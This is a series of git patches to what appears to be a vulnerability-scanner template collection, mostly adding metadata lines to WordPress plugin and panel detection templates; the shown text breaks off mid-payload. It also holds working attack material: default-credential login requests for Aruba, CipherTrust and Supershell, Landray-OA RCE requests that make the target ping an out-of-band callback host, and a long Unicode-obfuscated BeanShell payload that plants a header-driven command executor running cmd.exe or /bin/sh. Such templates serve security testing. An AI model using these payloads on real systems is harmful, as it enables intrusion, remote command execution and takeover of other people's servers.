-7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: + max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..b36317acd8 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: + max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..5eb35dd17e 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: + max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..ceb2b8d600 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: + max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From e0df45b7b28a3e7e46ce6be08e601891c9eed716 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO <righettod@users.noreply.github.com> Date: Fri, 8 Sep 2023 08:33:33 +0200 Subject: [PATCH 0220/1090] Add shodan query --- http/exposed-panels/quilium-panel.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/exposed-panels/quilium-panel.yaml b/http/exposed-panels/quilium-panel.yaml index 57b58f6537..e42270a97b 100644 --- a/http/exposed-panels/quilium-panel.yaml +++ b/http/exposed-panels/quilium-panel.yaml @@ -11,6 +11,7 @@ info: metadata: max-request: 1 verified: true + shodan-query: http.html:"CMS Quilium" tags: panel,quilium,login,detect http: @@ -31,4 +32,4 @@ http: part: body group: 1 regex: - - 'CMS Quilium ([a-f0-9.]+)' \ No newline at end of file + - 'CMS Quilium ([a-f0-9.]+)' From 0aab17e06c5c813d1c13dde4aa7839103b774d74 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <ritikchaddha.1415@gmail.com> Date: Fri, 8 Sep 2023 16:55:00 +0530 Subject: [PATCH 0221/1090] Updated assigned templates --- .../others/aruba-instant-default-login.yaml | 40 +++++++++++++++ .../others/ciphertrust-default-login.yaml | 40 +++++++++++++++ .../others/supershell-default-login.yaml | 33 ++++++++----- .../landray/landray-oa-datajson-rce.yaml | 29 ----------- .../landray/landray-oa-erp-data-rce.yaml | 32 ------------ ...andray-oa-sysSearchMain-editParam-rce.yaml | 17 ++++--- .../landray/landray-oa-treexml-rce.yaml | 37 ++++++++------ ...ort-component-arbitrary-file-download.yaml | 32 ------------ ...telligent-campus-system-password-leak.yaml | 31 ++++++------ .../other/aruba-instant-default-login.yaml | 27 ---------- ...xecl-download-arbitrary-file-download.yaml | 25 ---------- ...rtrust-default-password-vulnerability.yaml | 27 ---------- .../other/cloud-oa-system-sqli.yaml | 34 ++++++++----- .../other/cmseasy-crossall-act-sqli.yaml | 29 ++++++----- .../other/h2console-unauth.yaml | 29 ----------- .../kingdee-apusic-directory-traversal.yaml | 41 ---------------- .../shiziyu-cms-apicontroller-sqli.yaml | 32 +++++++----- .../spring/jolokia-logback-jndi-rce.yaml | 20 ++++---- .../topsec/topsec-topacm-rce.yaml | 23 ++++++--- ...load-controller-arbitrary-file-upload.yaml | 49 +++++++++++-------- ...ceserverservlet-arbitrary-file-upload.yaml | 27 ---------- ...-oa-smartupload-arbitrary-file-upload.yaml | 29 ----------- ...u-oa-teleconferenceservice-xxe-inject.yaml | 28 ++++++++--- ...nhuoa-officeserverservlet-file-upload.yaml | 32 ++++++++++++ .../wanhuoa-smartupload-file-upload.yaml | 32 ++++++++++++ 25 files changed, 342 insertions(+), 433 deletions(-) create mode 100755 http/default-logins/others/aruba-instant-default-login.yaml create mode 100755 http/default-logins/others/ciphertrust-default-login.yaml delete mode 100755 http/vulnerabilities/other/aruba-instant-default-login.yaml delete mode 100755 http/vulnerabilities/other/ciphertrust-default-password-vulnerability.yaml delete mode 100755 http/vulnerabilities/wanhu/wanhu-oa-officeserverservlet-arbitrary-file-upload.yaml delete mode 100755 http/vulnerabilities/wanhu/wanhu-oa-smartupload-arbitrary-file-upload.yaml create mode 100755 http/vulnerabilities/wanhu/wanhuoa-officeserverservlet-file-upload.yaml create mode 100755 http/vulnerabilities/wanhu/wanhuoa-smartupload-file-upload.yaml diff --git a/http/default-logins/others/aruba-instant-default-login.yaml b/http/default-logins/others/aruba-instant-default-login.yaml new file mode 100755 index 0000000000..0c1b1e55dd --- /dev/null +++ b/http/default-logins/others/aruba-instant-default-login.yaml @@ -0,0 +1,40 @@ +id: aruba-instant-default-login + +info: + name: Aruba Instant - Default Login + author: SleepingBag945 + severity: high + description: | + Aruba Instant is an AP device. The device has a default password, and attackers can control the entire platform through the default password admin/admin vulnerability, and use administrator privileges to operate core functions. + reference: + - https://www.192-168-1-1-ip.co/aruba-networks/routers/179/#:~:text=The%20default%20username%20for%20your,control%20panel%20of%20your%20router. + metadata: + max-request: 1 + verified: true + fofa-query: body="jscripts/third_party/raphael-treemap.min.js" || body="jscripts/third_party/highcharts.src.js" + tags: aruba,default-login + +http: + - raw: + - | + POST /swarm.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + opcode=login&user={{username}}&passwd={{password}}&refresh=false&nocache=0.17699820340903838 + + attack: pitchfork + payloads: + username: + - admin + password: + - admin + + host-redirects: true + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200' + - 'contains(body_1,"name=\"sid") && contains(body_1,"true\">Admin")' + condition: and \ No newline at end of file diff --git a/http/default-logins/others/ciphertrust-default-login.yaml b/http/default-logins/others/ciphertrust-default-login.yaml new file mode 100755 index 0000000000..46a15ada48 --- /dev/null +++ b/http/default-logins/others/ciphertrust-default-login.yaml @@ -0,0 +1,40 @@ +id: ciphertrust-default-login + +info: + name: Ciphertrust - Default Login + author: SleepingBag945 + severity: high + description: | + Attackers can control the entire platform through the default password (initpass) vulnerability, and use administrator privileges to operate core functions. + reference: + - https://www.thalesdocs.com/ctp/cm/2.6/get_started/deployment/initial-password/index.html#:~:text=The%20username%20of%20the%20initial,to%20%22admin%22%20in%20lowercase. + metadata: + max-request: 1 + verified: true + fofa-query: cert="Ciphertrust" || fid="yHV5+ZZGMu0=" + tags: default-login,ciphertrust + +http: + - raw: + - | + POST /api/v1/auth/tokens/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"username":"{{username}}","connection":"local_account","password":"{{password}}","grant_type":"password","refresh_token_revoke_unused_in":30,"cookies":true,"labels":["web-ui"]} + + attack: pitchfork + payloads: + username: + - admin + password: + - admin + + host-redirects: true + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 401' + - 'contains(body_1,"code") && contains(body_1,"message\":\"Password change required")' + condition: and \ No newline at end of file diff --git a/http/default-logins/others/supershell-default-login.yaml b/http/default-logins/others/supershell-default-login.yaml index 986f882726..772fb5fb0f 100644 --- a/http/default-logins/others/supershell-default-login.yaml +++ b/http/default-logins/others/supershell-default-login.yaml @@ -1,32 +1,41 @@ id: supershell-default-login info: - name: supershell 默认密码 + name: Supershell - Default Login author: SleepingBag945 severity: high description: | - Supershell 是一个通过 WEB 服务访问的 C2 远控平台。SuperShell 存在默认口令漏洞,可通过 tdragon6:tdragon6 登陆获取系统权限。 + Supershell is a WEB management platform that integrates the reverse_ssh service. reference: - https://github.com/tdragon6/Supershell - tags: supershell + - https://www.ctfiot.com/129689.html + metadata: + max-request: 1 + verified: true + fofa-query: title="supershell" + tags: supershell,default-login http: - raw: - | POST /supershell/login/auth HTTP/1.1 Host: {{Hostname}} - Accept: */* - X-Requested-With: XMLHttpRequest - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.127 Safari/537.36 Content-Type: application/json - Accept-Encoding: gzip, deflate - Accept-Language: zh-CN,zh;q=0.9 - {"username":"tdragon6","password":"tdragon6"} + {"username":"{{username}}","password":"{{password}}"} + attack: pitchfork + payloads: + username: + - tdragon6 + password: + - tdragon6 + + host-redirects: true + cookie-reuse: true matchers: - type: dsl dsl: - - status_code_1 == 200 && !contains(body_1,"failed") - - contains(header_1,"token=ey") && contains(body_1,"success") - condition: and + - 'status_code_1 == 200 && !contains(body_1,"result\":\"failed")' + - 'contains(header_1,"token=ey") && contains(body_1,"{\"result\":\"success")' + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/landray/landray-oa-datajson-rce.yaml b/http/vulnerabilities/landray/landray-oa-datajson-rce.yaml index 1cb35bec70..e69de29bb2 100755 --- a/http/vulnerabilities/landray/landray-oa-datajson-rce.yaml +++ b/http/vulnerabilities/landray/landray-oa-datajson-rce.yaml @@ -1,29 +0,0 @@ -id: landray-oa-datajson-rce - -info: - name: Landray-OA - s_bean sysFormulaSimulateByJS RCE - author: SleepingBag945 - severity: critical - description: Landray-OA s_bean sysFormulaSimulateByJS RCE - reference: - - https://github.com/k3sc/Landray-oa-rce-1/blob/main/poc.py - metadata: - fofa-query: app="Landray-OA系统" - tags: landray,rce - - -http: - - raw: - - | - GET /data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=%66%75%6e%63%74%69%6f%6e%20%74%65%73%74%28%29%7b%20%72%65%74%75%72%6e%20%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%7d%3b%72%3d%74%65%73%74%28%29%3b%72%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%70%69%6e%67%20%2d%63%20%34%20{{interactsh-url}}%22%29&type=1 HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Connection:close - - matchers: - - type: word - part: interactsh_protocol - name: http - words: - - "dns" - - "http" \ No newline at end of file diff --git a/http/vulnerabilities/landray/landray-oa-erp-data-rce.yaml b/http/vulnerabilities/landray/landray-oa-erp-data-rce.yaml index fec680dc73..e69de29bb2 100755 --- a/http/vulnerabilities/landray/landray-oa-erp-data-rce.yaml +++ b/http/vulnerabilities/landray/landray-oa-erp-data-rce.yaml @@ -1,32 +0,0 @@ -id: landray-oa-erp-data-rce - -info: - name: Landray-OA - erp_data.jsp RCE - author: SleepingBag945 - severity: critical - description: Landray-OA - erp_data.jsp RCE - reference: - - https://cn-sec.com/archives/1249492.html - metadata: - fofa-query: app="Landray-OA系统" - tags: landray,rce - - -http: - - raw: - - | - POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - var={"body":{"file":"/tic/core/resource/js/erp_data.jsp"}}&erpServcieName=sysFormulaValidate&script=Runtime.getRuntime().exec("ping -c 4 {{interactsh-url}}"); - - - - matchers: - - type: word - part: interactsh_protocol - name: http - words: - - "dns" - - "http" \ No newline at end of file diff --git a/http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml b/http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml index 066c13b9da..e136db55ea 100755 --- a/http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml +++ b/http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml @@ -1,17 +1,21 @@ id: landray-oa-sysSearchMain-editParam-rce info: - name: Landray-OA - sysSearchMain editParam RCE + name: Landray-OA - Remote code Execution author: SleepingBag945 severity: critical - description: Landray-OA - sysSearchMain editParam RCE + description: Landray-OA through sysSearchMain editParam is vulnerable to Remote Code Execution. reference: - https://www.modb.pro/db/555240 - https://github.com/mhaskar/XMLDecoder-payload-generator metadata: + max-request: 1 + verified: true fofa-query: app="Landray-OA系统" tags: landray,rce +variables: + payload: '{"body":{"file":"/sys/search/sys_search_main/sysSearchMain.do?method=editParam"}}&fdParemNames=11&fdParameters=<java><void class="bsh.Interpreter"><void%20method=%22eval%22><string>\u0020\u0020\u0020\u0020\u0062\u006f\u006f\u006c\u0065\u0061\u006e\u0020\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0066\u0061\u006c\u0073\u0065\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0020\u0067\u0072\u006f\u0075\u0070\u0020\u003d\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u002e\u0063\u0075\u0072\u0072\u0065\u006e\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0028\u0029\u002e\u0067\u0065\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0028\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0046\u0069\u0065\u006c\u0064\u0020\u0066\u0020\u003d\u0020\u0067\u0072\u006f\u0075\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0020\u003d\u0020\u0028\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0029\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0067\u0072\u006f\u0075\u0070\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u0069\u0020\u003d\u0020\u0030\u003b\u0020\u0069\u0020\u003c\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u003b\u0020\u0069\u002b\u002b\u0029\u0020\u007b\u0020\u0074\u0072\u0079\u0020\u007b\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u0020\u0074\u0020\u003d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u005b\u0069\u005d\u003b\u0069\u0066\u0020\u0028\u0074\u0020\u003d\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u0074\u0072\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u004e\u0061\u006d\u0065\u0028\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0065\u0078\u0065\u0063\u0022\u0029\u0020\u007c\u007c\u0020\u0021\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0068\u0074\u0074\u0070\u0022\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0061\u0072\u0067\u0065\u0074\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0074\u0029\u003b\u0069\u0066\u0020\u0028\u0021\u0028\u006f\u0062\u006a\u0020\u0069\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u006f\u0066\u0020\u0052\u0075\u006e\u006e\u0061\u0062\u006c\u0065\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0069\u0073\u0024\u0030\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0020\u003d\u0020\u0028\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0029\u0020\u0028\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u006a\u0020\u003d\u0020\u0030\u003b\u0020\u006a\u0020\u003c\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0073\u0069\u007a\u0065\u0028\u0029\u003b\u0020\u002b\u002b\u006a\u0029\u0020\u007b\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0067\u0065\u0074\u0028\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0072\u0065\u0071\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0071\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0073\u0070\u0020\u003d\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0052\u0065\u0073\u0070\u006f\u006e\u0073\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u0030\u005d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u0030\u005d\u0029\u003b\u0073\u0074\u0072\u0020\u003d\u0020\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0029\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0048\u0065\u0061\u0064\u0065\u0072\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0022\u0054\u0065\u0073\u0074\u0022\u007d\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u0020\u0021\u003d\u0020\u006e\u0075\u006c\u006c\u0020\u0026\u0026\u0020\u0021\u0073\u0074\u0072\u002e\u0069\u0073\u0045\u006d\u0070\u0074\u0079\u0028\u0029\u0029\u0020\u007b\u0020\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0053\u0074\u0061\u0074\u0075\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0032\u0030\u0030\u0029\u007d\u0029\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u0020\u0063\u006d\u0064\u0073\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u0063\u006d\u0064\u002e\u0065\u0078\u0065\u0022\u002c\u0020\u0022\u002f\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u0020\u003a\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u002f\u0062\u0069\u006e\u002f\u0073\u0068\u0022\u002c\u0020\u0022\u002d\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u0022\u0047\u0042\u004b\u0022\u003a\u0022\u0055\u0054\u0046\u002d\u0038\u0022\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0074\u0065\u0078\u0074\u0032\u0020\u003d\u0028\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0053\u0063\u0061\u006e\u006e\u0065\u0072\u0028\u0028\u006e\u0065\u0077\u0020\u0050\u0072\u006f\u0063\u0065\u0073\u0073\u0042\u0075\u0069\u006c\u0064\u0065\u0072\u0028\u0063\u006d\u0064\u0073\u0029\u0029\u002e\u0073\u0074\u0061\u0072\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0029\u002c\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u0029\u002e\u0075\u0073\u0065\u0044\u0065\u006c\u0069\u006d\u0069\u0074\u0065\u0072\u0028\u0022\u005c\u005c\u0041\u0022\u0029\u002e\u006e\u0065\u0078\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0072\u0065\u0073\u0075\u006c\u0074\u003d\u0028\u0022\u0045\u0078\u0065\u0063\u0075\u0074\u0065\u003a\u0020\u0020\u0020\u0020\u0022